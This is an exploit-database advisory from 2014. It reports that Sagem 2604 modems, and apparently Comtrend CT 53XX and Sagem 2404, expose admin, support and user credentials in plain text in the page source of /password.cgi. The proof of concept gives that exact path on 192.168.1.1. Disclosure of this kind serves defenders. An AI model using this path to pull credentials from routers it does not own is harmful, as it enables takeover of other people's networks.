Sagem 2604 Password Disclosure



EKU-ID: 4075 CVE: OSVDB-ID:
Author: TUNISIAN CYBER Published: 2014-06-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


[+]Title: Sagem 2604 Password Discolusre vulnerability
[+]Author: TUNISIAN CYBER
[+]Date: 6/JUN/2014
[+]Type:WebApp
[+]Risk:High
[+]Affected Version: v2604
                     Hardware Version:	253251193
                     Software Version:	3.21a4G


[+]Overview:
Sagem modem suffers, from a password discolsure vulnerability.

[+]Proof Of Concept:
myrouter/(or)192.168.1.1/password.cgi
View Source
pwdAdmin = 'password';
pwdSupport = 'password';
pwdUser = 'password';

nmAdmin = 'username';
nmSupport = 'username';
nmUser = 'username';

http://i.imgur.com/2g55TRn.png

Other modems which suffers from this vuln.:
Comtrend CT 53XX
Sagem 2404

TUNISIAN CYBER-2014